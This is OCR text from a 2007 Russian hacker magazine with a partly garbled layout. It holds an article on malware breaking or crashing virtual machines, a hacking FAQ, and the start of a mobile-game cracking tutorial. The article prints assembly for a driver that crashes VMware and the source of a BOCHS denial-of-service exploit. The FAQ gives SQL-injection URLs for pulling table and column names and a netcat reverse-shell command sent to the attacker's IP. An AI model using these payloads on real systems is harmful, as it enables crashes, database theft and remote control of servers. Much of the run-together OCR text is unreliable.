книги хакеры / журнал хакер / 105_Optimized

Зловредный код вгоняет виртуальную машину в сон

отлаживатьнанейочередногочервя,непомешаетустановитьвсе последниеобновления.Сдругойстороны,болеедревниеверсии выглядятменеенавороченнымиипотенциальноболееустойчивы кпрорывузапределывиртуальноймашины.Тоестьтрадиционные мерыпредосторожностинепомешают.Ведькогда-точервейотла- живалинепосредственнонаосновныхкомпьютерах,ивбольшинствеслучаевничеготрагичногоприэтомнепроисходило. Ладно, будет считать, что с прорывом за пределы VMWare мы разобрались, и перейдем ко всевозможным пакостям внутри нее. Следующий код вызывает остановку виртуальной машины (что равносильно команде Power/Suspend в главном меню виртуальной машины), однако после пробуждения она, увы, оказывается безнадежно зависшей, и поэтому приходится перезагружаться.

ИсходныйкоддрайвераVMWare-crash.asm,вго- няющеговиртуальнуюмашинувсон,изкоторого ейуженепроснуться .686 .model flat, stdcall

.code

DriverEntry proc mov eax, 110 mov ebx, 3 int 80h

mov ax, 6c81h mov dx, 1004h out dx, ax xor ebx, ebx xor eax, eax inc eax int 80h

mov eax, 0C0000182h; STATUS_DEVICE_ CONFIGURATION_ERROR ret DriverEntry endp

end DriverEntry

Компилируется драйвер средствами NT DDK и делается это вполне стандартной командной стройкой следующего содержания:

xàêåð 09 /105/ 07

BOCHS за работой

«на Security Focus’e значится всего одна ошибка типа переполнения буфера, вызывающая отказ в обслуживании, которая относится к версии BOCHS 2.3. Обнаруженная в конце мая 2007 года, она все еще остается достаточно актуальной — далеко не все пользователи BOCHS’а удосужились скачать заплатку»

ml /nologo /c /coff VMWareSL.asm

link /driver /base:0x10000 /align:32 /out:VMWareSL. sys /subsystem:native VMWareSL.obj

Для загрузки драйвера на лету хорошо подходит бесплатная утилита w2k_load.exe, написанная Свеном Шрайбером и прилагаемая к книге «Недокументированные возможности Windows 2000». Те, у кого этой книги нет, могут скачать утилиту с моего сайта: http://nezumi.org.ru/souriz/ hack/w2k_load.zip. Рядышком лежат исходные тексты драйвера-убийцы и готовая бинарная сборка (на тот случай, если под рукой не окажется NT DDK): http://nezumi.org.ru/souriz/hack/vmware-crash.zip.

Естественно, NTDDK — это не догма. С ничуть не меньшим успехом можно использовать, например, FASM или даже засунуть ассемблерный код в загружаемый модуль ядра и натравить его на Linux.

При этом VMWare конкретно поедет крышей и аварийно завершит работу всех гостевых машин с выдачей ругательного диалогового окна с надписью «*** VMware Workstation internal monitor error ***» и с кучей ненужной технической информации.

К тому же VMWare поддерживает специальный недокументированный back-door интерфейс, позволяющий гостевым операционным системам управлять виртуальной машиной. Это дает зловредному коду возможность определить, что он исполняется отнюдь не на живом железе, а работает под VMWare, которую посредством того же back-door интерфейса можно отправить в глубокий даун.

Back-doorинтерфейсбылдетальноисследованяпонскимхакеромпоимени Kato,которыйописалегонасвоейстраничке:http://chitchat.at.infoseek. co.jp/vmware/backdoor.html.Вобщихчертахвсевыглядитприблизительно так.ВрегистрEAXзаносится«волшебныйпирожок»,представляющий собойконстанту564D5868h,послечеговCXпомещаетсяномеркоманды,ав

EBX—еепараметры(описаниякомандвместеспараметрамиможнонайти настраницеуKato).Послеэтогоосуществляетсязапись(иличтение)порта 5658h,черезкоторый,собственноговоря,ипроисходитвзаимодействие гостевойоперационнойсистемысвиртуальноймашиной.

Принципработыback-doorинтерфейсаVMWare

Естественно, можно (и нужно) пройтись по коду VMWare hiew’ом, найти в ней все константы 564D5868h и заменить их чем-нибудь другим. Для большей надежности то же самое следует проделать с номером порта. Работоспособности VMWare это не нарушит, зато зловредный код потеряет возможность пролезть через back-door интерфейс.

Впрочем, VMWare уже достаточно скомпрометировала себя, и спасти ее репутацию сможет разве что чудо. Но чудес, как известно, не бывает, а вот конкуренты имеются в большом ассортименте.

К примеру, рассмотрим весьма популярный эмулятор BOCHS (bochs. sourceforge.net). Он ужасно тормозной, зато бесплатный и, что самое важное, за все время своего существования не обнаруживший ни одной дыры, позволяющей зловредному коду вырваться за пределы виртуальной машины. Другая полезная вкусность — встроенный отладчик, работающий на уровне виртуальной машины и потому совершенно невидимый для отлаживаемого кода. Короче говоря, с точки зрения безопасности весь потенциально опасный код лучше всего исследовать под BOCHS’ем.

Однако BOCHS все-таки содержит несколько некритических ошибок переполнения, которые позволяют гостевой операционной системе вызывать аварийное завершение работы эмулятора, препятствующее отладке малвари. Но на саму операционную систему зловредный код воздействовать не может, точнее, пути такого воздействия неизвестны. В частности, на Security Focus’e значится всего одна ошибка типа переполнения буфера, вызывающая отказ в обслуживании, которая относится к версии BOCHS 2.3. Обнаруженная в конце мая 2007 года хакером по кличке Tavis Ormandy, она все еще остается достаточно актуальной — далеко не все пользователи BOCHS’а удосужились скачать с сайта заплатку.

Ниже приводится исходный текст эксплойта, позаимствованный с http://downloads.securityfocus.com/vulnerabilities/exploits/24246.c:

Исходныйкодэксплойта,вызывающийпереполнение буферавэмулятореBOCHS2.3споследующимотказом вобслуживании

#include <sys/io.h>

Прорыв из-под VMWare через дыру в Vmnat

int main(int argc, char **argv)

{

iopl(3); outw(0x5292, 0x24c);

outw(0xffff, 0x245);(a) outw(0x1ffb, 0x24e); outb(0x76, 0x241); outb(0x7b, 0x240); outw(0x79c4, 0x247); outw(0x59e6, 0x240); return 0;

}

Покопавшись в исторических хрониках, можно также обнаружить имевшую место быть ошибку переполнения кучи в модуле виртуальной сетевой карты NE2000 RX, которая осуществлялась записью слишком большого числа в регистр TXCNT, что позволяло модифицировать память эмулятора. Исходный код уязвимого фрагмента последнего приведен ниже:

ФрагментисходногокодауязвимогомодуляэмуляторасетевойкартыNE2000RX

void bx_ne2k_c::rx_frame( const void *buf, unsigned io_len)

{

/* ... */

//copy into buffer, update curpage, and

//signal interrupt if config’d

startptr = &BX_NE2K_THIS s.mem[BX_NE2K_THISs. curr_page*256 BX_NE2K_MEMSTART];

if ((nextpage > BX_NE2K_THIS s.curr_page) || ((BX_NE2K_THIS s.curr_page + pages) == BX_NE2K_THIS s.page_stop))

{

memcpy(startptr, pkthdr, 4); memcpy(startptr + 4, buf, io_len); BX_NE2K_THIS s.curr_page = nextpage;

/* ... */

Впрочем, не известно ни одного зловредного кода, реально использующего эту уязвимость для своего блага. Между тем с ростом популярности виртуальных машин как инструмента «трепанации» малвари создатели последней уже начинают задумываться о методах борьбы, оттачивая новые технологии нападения и обороны.z

xàêåð 09 /105/ 07

faq you faqing faq

еВГенИй «CoRwin» еРМакОВ

/ HACK-FAQ@REAL.XAKEP.RU /

Q: передаюМетодоМPostуязвиМоМуприложениюсвои

значения,ноприэтоМнеполучаюрезультата.почеМу?

A: скореевсего,тынеизменяешьзначениеHTTP-заголовкаContent- Lenght.Вэтомполеуказанавсимволахдлинаданных,передаваемыхметодомPOST.Такимобразом,тыпосылаешьсвоиданные,не изменивзначениеихобъемавContent-Lenght,итеобрабатыва- ютсянекорректно.

Q: нужнаутилитаподниксыдляМониторингауровня

сигналаWI-fI.чтоподскажешь?

A: Дляначала—Kismet,котораяумеетопределятьуровеньсигнала. Потом—утилитаWavemonсосвоимудобнымграфиком,затем

—WirelessPowerMeterиWlanmeter.

Q: нуачтоизаналогичногосоФтаестьподкпк?

A: Wi-FiManager,позволяющийпосмотретьсписокдоступныхсетейи уровеньсигналаоткаждойизних.Wi-FiGraph, дающаявозможность моментальнообнаруживатьWi-Fiсеть,находитьближайшуюточку доступаипроводитьмониторингработыбеспроводнойсети.

Ксожалению,наданныймоментWi-FiGraphподдерживаеттолькомодули связи,использующиечипсетPrism,иКПКнабазенекоторых другихчипсетов.

Q: яновичоквхакингеWI-fI,хочуспросить,какузнать,

естьливовзлаМываеМойсетивыходвинтернет?

A: ПоможетанализтрафикапопротоколуDHCPиобнаружениевнем IP-адресовшлюзов.задействуйустановленныйвпрограмме

Ettercapмодульtriton.

Q: нужноузнатьвсестолБцыитаБлицывoRAClE,нокак?

A: ВэтойсубДсуществуюттаблицы,аналогичныеINFORMATION_ SCHEMA.TABLESиINFORMATION_SCHEMA.TABLESвMSSQL.Это таблицыSYS.USER_TABLESиSYS.USER_TAB_COLUMNS.узнать изнихназваниятаблициколоноктакжелегко,какивMSSQL:

http://target.com/script.php?p=1 union select table_ name from sys.user_tables--

атакже:

http://target.com/script.php?p=1 union select column_ name from sys.user_tab_columns--

Длявыуживаниявсехколонокитаблицпоможетоператорrownum. Пример:

http://target.com/script.php?p=1 union select column_name from sys.user_tab_columns where rownum < 3--

Q: непойМу,вчеМтраБл:пытаюсьвытащитьчерезуязви-

МыйскриптназваниятаБлицистолБцоввPostgREsQl,но оБлаМываюсь.

A: ВстарыхверсияхPostgreSQLнеттаблицыINFORMATION_SCHEMA. TABLES/COLUMNS,хранящейназваниявсехтаблицистолбцов. Возможно,из-заэтогоинеполучаетсявытащитьданные.но вместонееимеетсятаблицаPG_TABLES.

Пример:

http://target.com/script.php?p=1 union select TABLENAME from PG_TABLES/**/

названиястолбцовпридетсяподбиратьсамому.

Q: япрошудругапоМочьМневпроведенииsQl-InjECtIonв

MysQl,аонспрашиваетверсиюсуБд.вчеМотличияверсий

MysQl?

A: насамомделеотличияоченьзначительные.рассмотримтриветки MySQLпопорядку.небудемзатрагиватьневажныедлянасизменениявверсиях.

MySQL3.*—тутвпринципеотсутствуетоператорUNION. MySQL4.*—появляетсяоператорUNION.

MySQL5.*—взломщикибазданныхаплодируютпрограммистамMySQL

стоя—появиласьтаблицаINFORMATION.SCHEMA_TABLES.

Вытащитьданныеизмускуласталоещелегче.Теперьпроцесс взломааналогиченвзломуMSSQL.

Q: естьнесколькопростыхвопросовповеБ-взлоМу:

1.точнознаю,чтонасервересуществуетопределенная директория,но,оБращаяськней,яполучаютолькопустую страницу.вчеМдело?

2.неМогуподоБратьиМенатаБлициколоноквБд.какБыть?

A: 1.админынезабилинабезопасностьисоздалифайл.htaccess,огра- ничивающийпросмотрдирыпоIP-адресупросматривающего.

2.Когдавопроскасаетсятехническогоаспектавзлома,такпростосказать ничегонельзя. нуавообще,иногданазванияпеременныхhtmlформсовпадаютсреальныминазваниямитаблиц/колонок.К примеру,имеемформудлявходавадминку,смотримеекод:

<div class="inputlabel">Имя</div>

<div><input title="Введите ваше имя " name="usrname" type="text" class="inputbox" size="15" /></div>

<div class="inputlabel">Ïароль</div>

<div><input title="Çдесь введите пароль " name="pass" type="password" class="inputbox" size="15" /></ div>

Видимпередаваемыескриптупараметрыusrnameиpass.Пытаемся использоватьихвкачествеименколонок.

http://target.com/script.php?p=1 union select username, pass from table_name/*

Еслиизвестноназваниеуязвимогодвижкаиегосорцыестьвинтернете, простокачаемихисмотримфайл,отвечающийзасозданиеструктурыбД(чащевсегоэтоinstall.php).Втакомскриптепрописаны командыдлясозданиютаблицистолбцоввбазеданных.

Кпримеру,естьбажнаяCMS—TargetCMS.смотримкусоккодаизфайла install.php:

...

CREATE TABLE accounts( id INT PRIMARY KEY, username CHAR(10), password CHAR(8), email CHAR(20)

...

здесьмывидимструктурубудущейбД—нужныенамназваниятаблици столбцов.

Q: недавновстретилнепонятныйМнетерМин—REvERsE tElnEt.чтоэто?

A: Думаю,тыслышалоback-connect.Таквотэтоиестьтотсамыйре- версивныйтелнет.навсякийслучайнапомню,чтоback-connect

—этоинициализацияtelnet-соединениясерверомквзломщику. используетсядляобходанавзломанномсерверефайрвола, препятствующегопрямомусоединениюхакерассервером.Для reversetelnetиспользуетсяизвестнаяутилитаNetcat,запущенная наПКвзломщикаинасамомвзламываемомсервере.

усебявtelnetмыпишемследующее:

nc -l -p 123

ТакмызапускаемNetcatврежимеожиданияподключенияклокальному порту123.

насервере,инициализирующемсоединение,пишем:

nc -e /bin/sh ÍÀØ_IP 123

Q: нуакакМне,какадМину,защититьсяотвозМожности

подключениячерезоБратныйтелнет?

A: запретитьчерезбрандмауэрсоединения,исходящиеотвнутреннего узлаилиweb-сервера,атакжеправильнорасставитьchmod’ына исполняемыефайлы,позволивиспользоватьихтольковладельцам.

Q: хочуустроитьсвоеМупроцучто-товродеBEnChMARK’A

повзлоМуMD5.этовозМожно?

A: Конечно.скачиваемMDCrack(http://membres.lycos.fr/mdcrack)и

запускаемизконсолисключомbenchmark:

MDCrack-sse.exe --benchmark

Q: скоростанудиплоМированныМспецоМпоинФоБезу

—появиласьпаравопросовпотрудоустройству:

1.сейчасвсетикучаонлайн-тестовпосаМыМразныМоБ- ластяМ,втоМчислеипоиБ.иМеетлисМыслегопроходить

иБудетлионигратьрольпритрудоустройстве?

2.какиеконкретноФакторывлияютнатрудоустройствои зараБотнуюплатувоБластииБ?

3.какиеконкретнонавыкитреБуютсяпритрудоустройстве специалистоМпоинФорМационнойБезопасности?

A: 1.сертификатыпройденныхру-тестированийвсерьезныхкомпанияхне котируются.Главнуюрольиграютопытработывнужнойдляконторы области(иб,кпримеру)инавыки,переченькоторыхтакжеуста- навливаетконтора-работодатель.Крометого,вру-сегментемнене встречалиськачественные,проверенныевременемтестирования поинформационнойбезопасности.ноеслиутебяестьопытработыи необходимыезнания,тогдасертификатможетбытьплюсом.

2.Какяужесказал,соответствующиенавыкии,главное,опыт.Какправи- ло,компаниямтребуютсясотрудникисопытомработы1-3года. Далее,большоезначениеимеютрекомендациисместапрежней работы.Дажееслисначала,присобеседовании,тебениктоне сказал,чтотребуетсязнаниеанглийскогоязыка,всеравноне стоитрасслабляться—раноилипозднохорошеевладениетехни- ческиминглишемобязательнопонадобится.

3.заранеескажу,чтовбольшинствеслучаевпослеокончаниявуза(все зависитотспециальности)многиенавыкиприходитсяосваивать самостоятельно.

Вотпримертребованийккандидатувсреднестатистическойфирме,в которойоткрытавакансияспецапоиб:

языкипрограммирования:C/C++,Assemblerx86.

знаниесетевыхтехнологий,сетевыхпротоколовнанизкомуровне,опыт разработки.

знаниеархитектурыOS,Win32API,особенностейзагрузкимодулей,организацииheapидр.

желательно:знаниеDDK,принциповнизкоуровневыхперехватовсистемныхфункций,работасвнутренниминедокументированными структурамиOS.

знаниеIDA/SoftICE/WinDBG.

умениеработатьстехническойдокументацией,проведение«исследований». опытпоанализусуществующихproofofconcept(PoC)уязвимостей,

exploits,shellcodes,leaktests(дляfirewallиHIPS).

опытпоискауязвимостейвпользовательскихприложениях,системных сервисах,разработкидемонстрационныхэксплойтовподних.

ПредставлениеоHTML,DHTML,JavaScript,VBScriptсточкизрения возможныхугроз.

желательно:опыттестированияfirewallнапредметбезопасности. желательно:опытобходаcontent-фильтров(http),IDS.

желательно:опытобходасуществующихсредствзащитыразграничения доступа,HIPS,антивирусов,firewall.

навыкиreverseengineeringи/илиpenetrationtesting,знаниеvx/rootkit-

технологий.

Q: хочу«отпугнуть»юныхкул-хакеровотсвоегоещене

протестированногоPhP-движка.возМожнолиэто?

A: Да.янебудувспоминатьнаипростейшиесредства,которыеуже былиописанывFAQ’e.Каквариант—обработкафайловсразлич- нымирасширениямикакPHP-скриптов:

AddType application/x-httpd-php .pl .asp .html .htm

Теперьможноуказатьнашимскриптамлюбоеобозначенноевыше расширение.z

опулярность мобильных игр стремительно растет. Они П прочно оккупировали рынок сотовых телефонов, комму-

никаторов, смартфонов, карманных компьютеров и других аналогичных устройств. Большинство игр распространяется на условно-бесплатной основе: когда необходимо платить, иначе

блокируют часть возможностей и/или ограничивают количество запусков. Но даже полностью бесплатные игры не лишены недостатков. Неудобное управление, быстро кончающиеся жизни — да мало ли существует причин, побуждающих хакера дорабатывать код в соответствии со своими предпочтениями? Этические проблемы взлома нас не волнуют, поэтому мы немедленно переходим к технической части, благо хвост уже зудит, чешется и рвется в бой. О взломе мобильных игр написано много, но все как-то неконкретно и не в тему. Не так-то просто обобщить свой опыт и передать его другим. Но я все же попробовал.

Мобильные платформы

Основная масса мобильных игр (по некоторым оценкам аж до ~70%) пишется на Java, а точнее, на J2ME, что расшифровывается как Java 2 Micro Edition. Это урезанная версия языка Java, ориентированная на маломощные системы и поддерживающая огромное множество мобильных устройств. Вместо живого машинного кода, сотовому телефону подсовывают так называемый «байт-код», исполняющийся на виртуальной Java-машине (Java Virtual Machine, или сокращенно JVM). Теоретически

игра, написанная для одного сотового телефона, будет работать на любом другом, независимо от особенностей его аппаратного обеспечения, что очень хорошо (хотя на практике переносимость намного хуже). Расплачиваться за это приходится драматическим падением производительности в условиях и без того маломощных микропроцессоров.

Продвинутые игры (наподобие Fight Hard 3D и RiderX 3D) пишутся на чистом машинном коде и потому могут исполняться только на микропроцессорах одного семейства (например, ARM 6), что ограничивает сферу их применения. В настоящей статье они не рассматриваются. Поскольку нельзя объять необъятное, мы сосредоточимся исключительно на взломе Java-приложений, а до Fight Hard доберемся не раньше, чем я куплю соответствующий сотовый телефон.

Чем мы будет ломать

Выбор хакерского инструментария — дело сугубо личное и, можно даже сказать, интимное. Поэтому не следует воспринимать приведенный ниже список как догму. Это всего лишь один из вариантов. Практически все обозначенные утилиты реализованы в двух-трех вариантах, как консольных, так и графических. Так что каждый может найти программу на свой вкус. Предлагаемая подборка включает в себя только бесплатные программы, игнорируя их коммерческие аналоги, иначе это не хакерство получилось бы, а сплошной рекурсивный спуск (чтобы сломать мобильную игру, нужно хакнуть программу, которая ее ломает).

Дизассемблированный байт-код в IDA Pro

Прежде всего нам потребуется спецификация на байт-код виртуальной Java-машины, выложенная на официальном сайте корпорации Sun (на английском языке): http://java.sun.com/docs/books/jvms/second_edition/ html/VMSpecTOC.doc.html, при этом знать сам язык Java нисколько

не обязательно, хотя и желательно. Во всяком случае, я несколько лет успешно хачил Java-приложения непосредственно в JVM, пока, наконец, не купил «Горький вкус Java» Брюса Тейта и не разобрался с основными языковыми концепциями, которые, кстати сказать, ничуть не облегчили ни дизассемблирование байт-кода, ни его анализ.

Лучшим дизассемблером Java-программ была и остается легендарная IDA Pro, распространяющаяся на коммерческой основе за нехилые деньги, однако при желании можно обойтись и без нее, воспользовавшись штатным дизассемблером, входящим в бесплатный Java SDK, или любой другой утилитой аналогичного назначения, которых в последнее время развелось как грибов (смотри JavaBite, описанный ниже).

Чтобы не корячиться над анализом байт-кода, имеет смысл прогнать ломаемое приложение через Java-декомпилятор, выдающий вполне читабельные и структурированные листинги. Java-декомпиляторов существует много. Хороших и разных. Я рекомендую бесплатный avaDec by wl, которым пользуюсь сам и который можно скачать с www.wasm.ru/baixado.php?mode=tool&id=362. Еще стоит попробовать JDecompiler с http://java-decompiler.qarchive.org. Он тоже неплох и бесплатен. Декомпилированный код можно хачить прямо в исходных текстах с последующей рекомпиляцией, но я этого делать не рекомендую, поскольку декомпилятор не всегда работает корректно и повторная компиляция зачастую ведет к краху программы, поэтому лучше патчить непосредственно сам байт-код.

Для модификации байт-кода (то есть «бит-хака») подойдет любой hexредактор, например всем известный hiew, однако лучше использовать специализированные инструменты, лучшим из которых является бесплатный JavaBite by BitArts, наглядно отображающий дерево классов, а также включающий в себя дизассемблер и ассемблер байт-кода

(www.wasm.ru/baixado.php?mode=tool&id=284).

Мобильные игры, как правило, распространяются в виде упакованных jar-файлов, создаваемых одноименной утилитой, входящей в состав Java SDK, однако это не единственно возможный вариант. Архиваторы 7ZIP (бесплатный) и WinAce (условно-бесплатный) справляются со своей задачей ничуть не хуже. Исключение составляют Java-приложения, снабженные цифровыми подписями. Ни 7ZIP, ни WinAce их создавать не умеют, да этого и не требуется. Любой сотовый телефон загрузит jarархив и без подписи.

Иногда рядом с jar-архивом лежит jad-файл, без которого некоторые модели телефонов откажутся загружать Java-приложение, и тут прихо-

Модификация байт-кода в JavaBite

дится прибегать к помощи бесплатной утилиты JADgen, генерирующей jad-файлы на основе jar-архивов (http://softsearch.ru/programs/134892 jadgen-download.shtml).

Некоторые хакеры для проверки работоспособности взломанных игр рекомендуют использовать эмулятор сотового телефона, другие же предпочитают живое железо, тем более что закачать приложение на телефон не проблема. Однако при этом существует возможность завесить аппарат так, что придется вынимать батарею или даже делать полный reset, удерживая определенные клавиши при включении (у каждой модели телефона свои), описание которых можно найти в сервисной документации. Впрочем, риск угробить телефон некорректным взломом очень сильно преувеличен. В 90% случаев некорректный хак пресекается жутко матерящимся Java-верификатором. В 9% случаев игра просто зависает, подвешивая за собой весь телефон. И только на 1% приходится разрушение содержимого энергонезависимой памяти и прочий бэд, так что неуверенным в себе хакерам все-таки стоит пользоваться эмулятором.

Что мы будем ломать

А ломать мы будем милую игрушку Macroman (реинкарнацию культовой компьютерной игры, выпущенной в 1979 году японской компанией Namco Тору и реализованной практически на всех 8 битных компьютерах типа ZX-Spectrum), демонстрационная версия которой распространяется бесплатно и валяется практически на любом мобильном сайте: www.cec. ru/Files/macroman_demo.jar.

Поставим себе задачу обессмертить колобка, чтобы игра никогда не кончалась. Главное — разобраться с техникой и стратегией взлома, освоив основные хакерские трюки и приемы. Остальные программы ломаются аналогичным образом, и неважно, что это — вечная жизнь или снятие ограничения с количества запусков.

Короче, кончай курить, мужики! Курить мы будет потом, а сейчас глотнем пива и возьмемся за дело.

Как мы будем ломать

Пускаем мы, значит, Macroman и даем ему умереть в зубах зловредных существ (типа приведений), агрессивно бегающих по лабиринту. На экране появляется надпись: «1 Life Left» («Осталась одна жизнь»). Очевидно, что код, выводящий эту строку, так или иначе связан с кодом, уменьшающим количество жизней при каждом акте поедания колобка. Во всяком случае, во всех императивных языках программирования (к которым принадлежит и Java) ситуация обстоит именно так.

Вот эту строку мы и будем искать. Но сначала распакуем jar-архив, пропустив его через 7ZIP (предварительно изменив расширение с jar на zip). И вот что мы получим в результате: